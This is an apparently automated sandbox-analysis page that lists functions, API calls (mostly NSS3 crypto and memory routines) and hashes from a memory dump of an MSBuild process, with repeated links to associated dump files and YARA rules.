Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: ppFunctionList = 0x%p$C_GetFunctionList$nyl
API String ID: 1907330108-919390699
Opcode ID: de272fbb5591b5a6dadab585ed3234b87bc00dcc093bd52e03b200d0dfa0c560
Instruction ID: 824a77b5236c679b2c7979750bb1958336e56750cec073cd6f3efb688d26c7af
Opcode Fuzzy Hash: de272fbb5591b5a6dadab585ed3234b87bc00dcc093bd52e03b200d0dfa0c560
Instruction Fuzzy Hash: 3901F1773000459FCB90DB68DA8CB5537F1EB8B329F084435E508E3610DF389959CBA6

Function 6C72AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC2D

Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
Part of subcall function 6C6CADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
Part of subcall function 6C6CADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
Part of subcall function 6C6CADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9

PK11_FreeSymKey.NSS3(?,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC59
free.MOZGLUE(8CB6FF01,6C706AC6,?,?,?,?,?,?,?,?,?,?,6C715D40,00000000,?,6C71AAD4), ref: 6C72AC62

Strings

@]ql, xrefs: 6C72AC05

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]ql
API String ID: 1595327144-2887016198
Opcode ID: 0b4151bf3910b2968358ba82b618589b206eebdd8e1a08bcd1b52a76fa3efdcf
Instruction ID: 364135853c11b501f144e02006c8e4160c33c3e0808f72d7e31ed5b4d02d84cd
Opcode Fuzzy Hash: 0b4151bf3910b2968358ba82b618589b206eebdd8e1a08bcd1b52a76fa3efdcf
Instruction Fuzzy Hash: 4B0128B56002149BDB00DF15E9C0B5677A8EB45B6DF1880A8E9498F706D735F888CBA6

Function 6C6F85A0 Relevance: 7.7, APIs: 5, Instructions: 209COMMON

Download Yara Rule

APIs

SECKEY_SignatureLen.NSS3(?), ref: 6C6F86AD
SECKEY_SignatureLen.NSS3(?), ref: 6C6F86D0

Part of subcall function 6C692340: PL_InitArenaPool.NSS3(?,security,00000090,00000008), ref: 6C692387
Part of subcall function 6C692340: PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C692391
Part of subcall function 6C692340: PORT_Alloc_Util.NSS3(00000000), ref: 6C6923AA
Part of subcall function 6C692340: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7A9F14,?), ref: 6C6923D2
Part of subcall function 6C692340: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6923E1
Part of subcall function 6C692340: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6923F5
Part of subcall function 6C692340: PL_FreeArenaPool.NSS3(?), ref: 6C692407

PK11_VerifyWithMechanism.NSS3(?,00000011,00000000,?,?,?), ref: 6C6F87B5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F87C9
PR_SetError.NSS3(FFFFD057,00000000), ref: 6C6F880B

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Item_$Alloc_ArenaPoolSignatureZfree$CallDecodeErrorFreeInitK11_MechanismOnceQuickVerifyWith
String ID:
API String ID: 4115714656-0
Opcode ID: 0ba5955eb0a13c504334e0e37bef5029df40aac3706f7c585b1543af4ca4df95
Instruction ID: 6027d218a627a164039d61d68b099b342527695db3acf216754b62c4b4ca8395
Opcode Fuzzy Hash: 0ba5955eb0a13c504334e0e37bef5029df40aac3706f7c585b1543af4ca4df95
Instruction Fuzzy Hash: 45819371A001099BDF04CF59D890BEE77B2EF4A314F24416AE929AB790D731ED42CB99

Function 6C6CC590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC636
PK11_FreeSymKey.NSS3(?), ref: 6C6CC6D7
PK11_FreeSymKey.NSS3(?), ref: 6C6CC6E1

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: 8b7663e3ecf5973aa3a6b70a93720c90d22a318fc2bdfbaca01fb7b7c1fc4d40
Instruction ID: 3c03420a42476238219d27d2ae80fee7d9f38219c830ee838094c6c969895a54
Opcode Fuzzy Hash: 8b7663e3ecf5973aa3a6b70a93720c90d22a318fc2bdfbaca01fb7b7c1fc4d40
Instruction Fuzzy Hash: 084164B560120AAFDB01AF69DD80DAB77A9EF19348B500034FD45D7710E731ED25CBAA

Function 6C712460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C7B7379,00000002,?), ref: 6C712493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7124B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124FE

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: 0854132c1becee94ce9282063dd1c34c2c8d1dc54aef8e7dc74bd8179ee2bab7
Instruction ID: 26746acf249870705f045868ad335fb2c07cdaca4e2182020e3d10d8b924ed56
Opcode Fuzzy Hash: 0854132c1becee94ce9282063dd1c34c2c8d1dc54aef8e7dc74bd8179ee2bab7
Instruction Fuzzy Hash: D43131B0A0411AABEB008FA5CD09BBBB7A4EF49309F144125FD2496A80EB34DD54C7A1

Function 6C718530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C718549
TlsGetValue.KERNEL32 ref: 6C7185CF
TlsGetValue.KERNEL32 ref: 6C7185FE
TlsGetValue.KERNEL32 ref: 6C718629
memcpy.VCRUNTIME140 ref: 6C718655

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$IdentitiesLayermemcpy
String ID:
API String ID: 2311246771-0
Opcode ID: f542126cc141d7c297c808e3edd7794f771c62c2c463d1dc121cb96834700d51
Instruction ID: e91ebbcb5d24eb8acb3af43cafbe74d4e6f48a209a1bdb006d545642bd42c675
Opcode Fuzzy Hash: f542126cc141d7c297c808e3edd7794f771c62c2c463d1dc121cb96834700d51
Instruction Fuzzy Hash: 604193B0609701CBEB109F38D64476AB7B5FF45308F16867AD89887F62DB30D485CB96

Function 6C67EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C67EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C67EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C67EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C67EEEB
free.MOZGLUE(?), ref: 6C67EEF6

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 3343df9aad5cfc63d20eeb2994e7b89bf340f3a3e4fa7ba230db0e707bd05df8
Instruction ID: be3e68cbbddee123f1a852fc982650e0f0fce70ced891db09d92e81f68e7dd2c
Opcode Fuzzy Hash: 3343df9aad5cfc63d20eeb2994e7b89bf340f3a3e4fa7ba230db0e707bd05df8
Instruction Fuzzy Hash: 2331D271A002019FEB309F28CC45BA67BB4FB4A315F140E39E85A87A51DB31E459CBF9

Function 6C79A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C79A55C
PR_IntervalNow.NSS3 ref: 6C79A573
PR_IntervalNow.NSS3 ref: 6C79A5A5
_PR_MD_UNLOCK.NSS3(?), ref: 6C79A603

Part of subcall function 6C749890: TlsGetValue.KERNEL32(?,?,?,6C7497EB), ref: 6C74989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C79A636

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Interval$CriticalEnterSectionValue
String ID:
API String ID: 959321092-0
Opcode ID: de569dbaddb068c5f03c303b0b0296394e71f4b5c9773007bccf90887498f4eb
Instruction ID: e1558871974ec14038f9762b17a12fce55730d8a32db3f141ed19b2973d4a1c6
Opcode Fuzzy Hash: de569dbaddb068c5f03c303b0b0296394e71f4b5c9773007bccf90887498f4eb
Instruction Fuzzy Hash: A0315EB1A026058FCB00DF29D688A5AB7F9BF55329B258575D8148BB16E730E884CB90

Function 6C6844D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C6844FF

Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825

SECOID_FindOID_Util.NSS3(?), ref: 6C684524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C684537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C684579

Part of subcall function 6C6841B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C6841BE
Part of subcall function 6C6841B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6841E9
Part of subcall function 6C6841B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C684227
Part of subcall function 6C6841B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C68423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C68459C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 305c76576208639567a4abf1b7d03f777a902a50b21ff12cc2e3f8bf7637e2c5
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: D021C7B16072009BEB10CE65AC54BBF77AD9F41758F140428A9158BBC1EBA1E904C6BA

Function 6C68E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C68E755,00000000,00000004,?,?), ref: 6C68E5F5

Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D

PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C68E62C
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C68E63E

Part of subcall function 6C6DF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C67F379,?,00000000,-00000002), ref: 6C6DF9B7

PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C68E65C

Part of subcall function 6C6ADDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6ADDEC
Part of subcall function 6C6ADDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C6ADE70
Part of subcall function 6C6ADDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C6ADE83
Part of subcall function 6C6ADDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C6ADE95
Part of subcall function 6C6ADDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C6ADEAE
Part of subcall function 6C6ADDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6ADEBB

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C68E68E

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
String ID:
API String ID: 2865137721-0
Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction ID: f0c40b8e0f0f802c2e8ede5de2cdf6e7b8437712ccf49ef09fbc4e8a39082539
Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction Fuzzy Hash: 0D21437AB03200AFFB005EA4DC80FAB77989F85358F154134EE0887A65EB21DD14C3E9

Function 6C68AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000,00000000), ref: 6C68ADA7

Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000,00000000), ref: 6C68ADB4

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C683FFF,?,?,?,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000), ref: 6C68ADD5

Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7A94B0,?,?,?,?,?,?,?,?,6C683FFF,00000000,?), ref: 6C68ADEC

Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C683FFF), ref: 6C68AE3C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: d7bcdff7f4dbe4b38c05899586ee910b0102c216773d8746e4cfbff50bd6f366
Instruction ID: c1e18285e89af3aba066d5ad0ffed01caa2d25f44b75af99dbfee7fdba17d999
Opcode Fuzzy Hash: d7bcdff7f4dbe4b38c05899586ee910b0102c216773d8746e4cfbff50bd6f366
Instruction Fuzzy Hash: 83115661E013085BF7009B649C04BBF73E89F9624DF048629EC1986782FB20E95982FA

Function 6C7104C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C71461B,-00000004), ref: 6C7104DF
TlsGetValue.KERNEL32(?,00000000,?,6C71461B,-00000004), ref: 6C710510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C710520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C71461B,-00000004), ref: 6C710534
GetLastError.KERNEL32(?,6C71461B,-00000004), ref: 6C710543

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 31b6127d5bd1904d550d90dc5e45aaa62307ab9b0394b3ad3c67dd9082d4e42e
Instruction ID: d05067325179c87b08e6c8e8c884b522bc2483f13a73444adf3b27cae0660a74
Opcode Fuzzy Hash: 31b6127d5bd1904d550d90dc5e45aaa62307ab9b0394b3ad3c67dd9082d4e42e
Instruction Fuzzy Hash: C011E771A081459BEB006E389D08F663BA8AF02319F684635E529D7D91EF31E564CB91

Function 6C6ACD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C6C1E10: TlsGetValue.KERNEL32 ref: 6C6C1E36
Part of subcall function 6C6C1E10: EnterCriticalSection.KERNEL32(?,?,?,6C69B1EE,2404110F,?,?), ref: 6C6C1E4B
Part of subcall function 6C6C1E10: PR_Unlock.NSS3 ref: 6C6C1E76

free.MOZGLUE(?,6C6AD079,00000000,00000001), ref: 6C6ACDA5
PK11_FreeSymKey.NSS3(?,6C6AD079,00000000,00000001), ref: 6C6ACDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C6AD079,00000000,00000001), ref: 6C6ACDCF
DeleteCriticalSection.KERNEL32(?,6C6AD079,00000000,00000001), ref: 6C6ACDE2
free.MOZGLUE(?), ref: 6C6ACDE9

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 6e0d054221035a4f4c64d48d8cd6fcd0ffc66866f42604f08876dd02eeb9760b
Instruction ID: b977ffd8251f6bb128596062914e49003d633b33efbc0b97f1c9e73c01307c99
Opcode Fuzzy Hash: 6e0d054221035a4f4c64d48d8cd6fcd0ffc66866f42604f08876dd02eeb9760b
Instruction Fuzzy Hash: 0011E0B2B01111BBDB00ABA4EC44996B7ACFF04369B140171E90A83E01E732F825CBE9

